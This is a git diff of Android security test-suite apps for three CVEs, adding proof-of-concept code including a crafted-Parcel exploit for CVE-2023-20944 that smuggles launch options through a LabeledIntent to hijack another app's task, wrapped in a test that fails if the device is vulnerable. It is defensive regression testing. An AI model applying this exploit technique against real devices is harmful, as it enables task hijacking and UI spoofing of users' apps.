diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
new file mode 100644
index 0000000..a7e088b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.Bundle;
+import android.widget.EditText;
+
+public class PocActivity extends Activity {
+    private static final int REQUEST_CODE = 0;
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        try {
+            super.onCreate(savedInstanceState);
+            EditText editText = new EditText(this);
+            setContentView(editText);
+            editText.requestFocus();
+
+            // Prepare VpnService
+            Intent intent = VpnService.prepare(this);
+            startActivityForResult(intent, REQUEST_CODE);
+        } catch (Exception e) {
+            // Ignore unintended exceptions here
+        }
+    }
+
+    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+        try {
+            if (requestCode == REQUEST_CODE && resultCode == RESULT_OK) {
+                // Start VpnService
+                startService(new Intent(this, PocService.class));
+            }
+        } catch (Exception e) {
+            // Ignore unintended exceptions here
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
new file mode 100644
index 0000000..2863ea3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.ParcelFileDescriptor;
+
+public class PocService extends VpnService {
+    private ParcelFileDescriptor mInterface;
+
+    @Override
+    public int onStartCommand(Intent intent, int flags, int startId) {
+        try {
+            mInterface =
+                    new Builder()
+                            .setSession(getString(R.string.vpnSessionName))
+                            .addAddress(getString(R.string.ipv4Address), 24)
+                            .addRoute(getString(R.string.port), 0)
+                            .establish();
+        } catch (Exception e) {
+            // Ignore unintended exceptions here
+        }
+        return START_STICKY;
+    }
+
+    @Override
+    public void onDestroy() {
+        try {
+            if (mInterface != null) {
+                mInterface.close();
+                mInterface = null;
+            }
+            super.onDestroy();
+            stopSelf();
+        } catch (Exception e) {
+            // Ignore unintended exceptions here
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
deleted file mode 100644
index af45847..0000000
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
+++ /dev/null
@@ -1,24 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- Copyright (C) 2022 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
-     http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<resources>
-    <string name="defaultSettingsPkg">com.android.settings</string>
-    <string name="getAvailabilityStatusMethodName">getAvailabilityStatus</string>
-    <string name="privateDnsPreferenceControllerClassName">.network.PrivateDnsPreferenceController
-    </string>
-    <string name="testFailMsg">Device is vulnerable to b/206987762!! Private DNS can be modified in
-    guest mode</string>
-</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
index 96cb205..731c594 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -17,10 +17,12 @@
 package android.security.cts.CVE_2022_20112;
 
 import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
 import static org.junit.Assert.assertFalse;
 import static org.junit.Assume.assumeNoException;
 import static org.junit.Assume.assumeTrue;
 
+import android.app.Instrumentation;
 import android.app.UiAutomation;
 import android.content.ComponentName;
 import android.content.Context;
@@ -40,51 +42,64 @@
 public class DeviceTest {
 
     @Test
-    public void testprivateDnsPreferenceController() {
-        UiAutomation uiAutomation = null;
+    public void testPrivateDnsPreferenceController() {
         try {
-            Context context = getInstrumentation().getTargetContext();
+            final Instrumentation instrumentation = getInstrumentation();
+            final Context context = instrumentation.getContext();
 
             // Retrieve settings package name dynamically
             Intent settingsIntent = new Intent(Settings.ACTION_SETTINGS);
             ComponentName settingsComponent =
                     settingsIntent.resolveActivity(context.getPackageManager());
-            String settingsPkgName = settingsComponent != null ? settingsComponent.getPackageName()
-                    : context.getString(R.string.defaultSettingsPkg);
+            String settingsPkgName =
+                    settingsComponent != null
+                            ? settingsComponent.getPackageName()
+                            : "com.android.settings";
 
             // Get vulnerable method 'getAvailabilityStatus' using reflection
-            Context settingsContext = context.createPackageContext(settingsPkgName,
-                    Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
+            final Context settingsContext =
+                    context.createPackageContext(
+                            settingsPkgName,
+                            Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
             ClassLoader settingsClassLoader = settingsContext.getClassLoader();
             Class<?> privateDnsPreferenceControllerClass =
-                    settingsClassLoader.loadClass(settingsPkgName
-                            + context.getString(R.string.privateDnsPreferenceControllerClassName));
+                    settingsClassLoader.loadClass(
+                            settingsPkgName + ".network.PrivateDnsPreferenceController");
             Constructor<?> privateDnsPreferenceControllerCstr =
                     privateDnsPreferenceControllerClass.getConstructor(Context.class);
             Object privateDnsPreferenceControllerObject =
                     privateDnsPreferenceControllerCstr.newInstance(settingsContext);
-            Method getAvailabilityStatusMethod = privateDnsPreferenceControllerClass
-                    .getDeclaredMethod(context.getString(R.string.getAvailabilityStatusMethodName));
+            Method getAvailabilityStatusMethod =
+                    privateDnsPreferenceControllerClass.getDeclaredMethod("getAvailabilityStatus");
             getAvailabilityStatusMethod.setAccessible(true);
 
             // Check if current user is guest user
-            uiAutomation = getInstrumentation().getUiAutomation();
-            uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
             final UserManager userManager = context.getSystemService(UserManager.class);
-            assumeTrue(userManager.isGuestUser());
-
-            // Invoke vulnerable method 'getAvailabilityStatus'
-            int status =
-                    (int) getAvailabilityStatusMethod.invoke(privateDnsPreferenceControllerObject);
-            assertFalse(context.getString(R.string.testFailMsg), status == 0 /* AVAILABLE */);
+            try (AutoCloseable withAdoptShellPermissionIdentity =
+                    withAdoptShellPermissionIdentity(
+                            instrumentation, android.Manifest.permission.CREATE_USERS)) {
+                assumeTrue(userManager.isGuestUser());
+                // Invoke vulnerable method 'getAvailabilityStatus'
+                int status =
+                        (int)
+                                getAvailabilityStatusMethod.invoke(
+                                        privateDnsPreferenceControllerObject);
+                assertFalse(
+                        "Device is vulnerable to b/206987762!! Private DNS can be modified in"
+                                + " guest mode",
+                        status == 0 /* AVAILABLE */);
+            }
         } catch (Exception e) {
             assumeNoException(e);
-        } finally {
-            try {
-                uiAutomation.dropShellPermissionIdentity();
-            } catch (Exception ignored) {
-                // Ignore exception here
-            }
         }
     }
+
+    private AutoCloseable withAdoptShellPermissionIdentity(
+            Instrumentation instrumentation, String permission) {
+        final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+        uiAutomation.adoptShellPermissionIdentity(permission);
+
+        // Remove permissions
+        return () -> uiAutomation.dropShellPermissionIdentity();
+    }
 }
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
new file mode 100644
index 0000000..89c9df9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-20944-target",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "target-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    manifest: "target-app/AndroidManifest.xml",
+    sdk_version: "current",
+}
+
+android_test_helper_app {
+    name: "CVE-2023-20944-test",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "test-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+    ],
+    manifest: "test-app/AndroidManifest.xml",
+    resource_dirs: [
+        "res",
+        "test-app/res",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
new file mode 100644
index 0000000..17f8d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="accountType">android.security.cts.CVE_2023_20944_test.account</string>
+    <string name="actionTarget">actionTarget</string>
+    <string name="activityName">android.accounts.ChooseTypeAndAccountActivity</string>
+    <string name="activityTarget">android.security.cts.CVE_2023_20944_target.TargetActivity</string>
+    <string name="allowableAccountTypes">allowableAccountTypes</string>
+    <string name="bcastActionTarget">CVE_2023_20944_TargetActivity</string>
+    <string name="launchTaskId">android.activity.launchTaskId</string>
+    <string name="msgFail">Device is vulnerable to b/244154558 !!</string>
+    <string name="noExceptionMsg">no exception</string>
+    <string name="pkgName">android</string>
+    <string name="pkgTarget">android.security.cts.CVE_2023_20944_target</string>
+    <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+    <string name="pocFailedMsg">pocActivity failed</string>
+    <string name="spannableString">AAAAAAAAAAAA\n</string>
+    <string name="status">status</string>
+    <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+    <string name="taskId">taskId</string>
+    <string name="taskOverlay">android.activity.taskOverlay</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..dc41a97
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+     http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_20944_target">
+    <application>
+        <activity android:name=".TargetActivity"
+            android:exported="true" />
+    </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
new file mode 100644
index 0000000..03b7c27
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+    @Override
+    protected void onResume() {
+        try {
+            super.onResume();
+            sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+                    .putExtra(getString(R.string.actionTarget), true)
+                    .putExtra(getString(R.string.taskId), getTaskId()));
+        } catch (Exception ignored) {
+            // ignoring exceptions here
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..45cb90b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_20944_test">
+    <application>
+        <activity android:name=".PocActivity" />
+        <activity android:name=".HijackActivity" />
+        <service android:name=".PocAuthService"
+            android:exported="false">
+            <intent-filter>
+                <action android:name="android.accounts.AccountAuthenticator" />
+            </intent-filter>
+            <meta-data
+                android:name="android.accounts.AccountAuthenticator"
+                android:resource="@xml/authenticator" />
+        </service>
+    </application>
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_20944_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..c58bc2e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+    android:accountType="android.security.cts.CVE_2023_20944_test.account" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
new file mode 100644
index 0000000..a0c7a241
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.ActivityTaskManager;
+import android.app.IActivityTaskManager;
+import android.app.UiAutomation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.os.ServiceManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private String mPocActivityStatus;
+    private int mTaskId;
+
+    @Test
+    public void testCVE_2023_20944() {
+        try {
+            final int waitMs = 5000;
+            final int waitPerIter = 200;
+            Context context = getInstrumentation().getContext();
+            UiAutomation uiAutomation = getInstrumentation().getUiAutomation();
+            uiAutomation.adoptShellPermissionIdentity();
+
+            // Registering a receiver here to wait for a broadcast from TargetActivity
+            final Semaphore targetReturn = new Semaphore(0);
+            final Semaphore pocReturn = new Semaphore(0);
+            BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+                @Override
+                public void onReceive(Context context, Intent intent) {
+                    try {
+                        if ((intent.getBooleanExtra(context.getString(R.string.actionTarget), false)
+                                && (mTaskId = intent.getIntExtra(context.getString(R.string.taskId),
+                                        -1)) != -1)) {
+                            targetReturn.release();
+                        }
+                        if ((mPocActivityStatus = intent
+                                .getStringExtra(context.getString(R.string.status))) != null) {
+                            pocReturn.release();
+                        }
+                    } catch (Exception ignored) {
+                        // ignore any exceptions
+                    }
+                }
+            };
+            IntentFilter filter = new IntentFilter(context.getString(R.string.bcastActionTarget));
+            context.registerReceiver(broadcastReceiver, filter);
+
+            // Start TargetActivity
+            Intent targetIntent = new Intent(Intent.ACTION_MAIN);
+            final String pkgTarget = context.getString(R.string.pkgTarget);
+            targetIntent.setClassName(pkgTarget, context.getString(R.string.activityTarget));
+            targetIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+            context.startActivity(targetIntent);
+            assumeTrue(context.getString(R.string.targetFailMsg),
+                    targetReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+
+            // Start PocActivity which in turn starts the ChooseTypeAndAccountActivity
+            Intent intent = new Intent(context, PocActivity.class);
+            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+            context.startActivity(intent);
+            assumeTrue(context.getString(R.string.pocFailedMsg),
+                    pocReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+            assumeTrue(context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+                    mPocActivityStatus.equals(context.getString(R.string.noExceptionMsg)));
+
+            // Failing the test if the taskId received from the target activity matches with the
+            // list of running taskId and topActivity has HijackActivity in the same taskId.
+            IActivityTaskManager iActivityTaskManager = IActivityTaskManager.Stub
+                    .asInterface(ServiceManager.getService(Context.ACTIVITY_TASK_SERVICE));
+            long start = System.currentTimeMillis();
+            while (!(iActivityTaskManager.getAllRootTaskInfos().toString()
+                    .contains(HijackActivity.class.getName()))
+                    && System.currentTimeMillis() - start < waitMs) {
+                Thread.sleep(waitPerIter);
+            }
+            boolean isDeviceVulnerable = false;
+            List<ActivityTaskManager.RootTaskInfo> runningTasks =
+                    iActivityTaskManager.getAllRootTaskInfos();
+            for (ActivityTaskManager.RootTaskInfo runningTaskInfo : runningTasks) {
+                for (int i = 0; i < runningTaskInfo.childTaskIds.length; ++i) {
+                    if (mTaskId == runningTaskInfo.childTaskIds[i] && runningTaskInfo.topActivity
+                            .getClassName().equals(HijackActivity.class.getName())) {
+                        isDeviceVulnerable = true;
+                        break;
+                    }
+                }
+            }
+            assertFalse(context.getString(R.string.msgFail), isDeviceVulnerable);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
index 4416990..921ffcd 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_20944_test;
 
 import android.app.Activity;
 
-public class PocActivity extends Activity {
+public class HijackActivity extends Activity {
 }
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
new file mode 100644
index 0000000..a4fb874
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
@@ -0,0 +1,108 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.app.Activity;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.os.PersistableBundle;
+import android.text.SpannableString;
+import android.text.style.TtsSpan;
+
+public class PocActivity extends Activity {
+
+    @Override
+    protected void onResume() {
+        try {
+            super.onResume();
+            int targetTaskId = getTaskId() - 1;
+            Bundle options = new Bundle();
+            options.putBoolean(getString(R.string.taskOverlay), true);
+            options.putInt(getString(R.string.launchTaskId), targetTaskId);
+            LabeledIntent targetIntent =
+                    new LabeledIntent(null, createLabelInjectingOptions(options), 0);
+            targetIntent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT);
+            targetIntent.setClassName(this, HijackActivity.class.getName());
+
+            // Return LabeledIntent from AuthService.addAccount
+            PocAuthService.sAddAccountResponse = new Bundle();
+            PocAuthService.sAddAccountResponse.putParcelable(AccountManager.KEY_INTENT,
+                    targetIntent);
+            startActivityForResult(new Intent()
+                    .setClassName(getString(R.string.pkgName), getString(R.string.activityName))
+                    .putExtra(getString(R.string.allowableAccountTypes),
+                            new String[] {getString(R.string.accountType)}),
+                    1);
+            sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+                    .putExtra(getString(R.string.status), getString(R.string.noExceptionMsg)));
+        } catch (Exception e) {
+            try {
+                sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+                        .putExtra(getString(R.string.status), e.getMessage()));
+            } catch (Exception ignored) {
+                // ignore any exceptions
+            }
+
+        }
+    }
+
+    private CharSequence createLabelInjectingOptions(Bundle options) {
+        final int BUNDLE_MAGIC = 0x4C444E42; // 'B' 'N' 'D' 'L', copied from BaseBundle
+        Parcel p = Parcel.obtain();
+
+        p.writeInt(0); // Will hold length
+        p.writeInt(BUNDLE_MAGIC);
+
+        // BEGIN data
+        int startOffset = p.dataPosition();
+        p.writeInt(0); // \0 at end of resultWho
+        p.writeInt(-1); // requestCode
+        p.writeInt(0); // flags
+        p.writeInt(0); // profilerInfo == null
+        p.writeInt(1); // options != null
+        int innerBundleLengthPos = p.dataPosition();
+        p.writeBundle(options);
+        int endOffset = p.dataPosition();
+        // END data
+
+        // Expand inner Bundle to defeat enforceNoDataAvail check
+        p.setDataPosition(innerBundleLengthPos);
+        int innerBundleLength = p.readInt();
+        p.setDataPosition(innerBundleLengthPos);
+
+        // To fully consume the Parcel data and to avoid BadParcelableException, 72 is added in
+        // innerBundleLength
+        p.writeInt(innerBundleLength + 72);
+
+        // Fix PersistableBundle length
+        p.setDataPosition(0);
+        p.writeInt(endOffset - startOffset);
+
+        // Read result as PersistableBundle
+        p.setDataPosition(0);
+        PersistableBundle wrapperBundle = p.readPersistableBundle();
+        p.recycle();
+
+        // Make a CharSequence
+        SpannableString spannableString = new SpannableString(getString(R.string.spannableString));
+        spannableString.setSpan(new TtsSpan("", wrapperBundle), 0, 0, 0);
+        return spannableString;
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
new file mode 100644
index 0000000..389ede2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+
+// Authenticator returning {@link #addAccountResponse} when addAccount operation is requested
+
+public class PocAuthService extends Service {
+     static Bundle sAddAccountResponse;
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return new PocAuthenticator(this).getIBinder();
+    }
+
+    private static class PocAuthenticator extends AbstractAccountAuthenticator {
+        @Override
+        public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+                String authTokenType, String[] requiredFeatures, Bundle options)
+                throws NetworkErrorException {
+            return sAddAccountResponse;
+        }
+
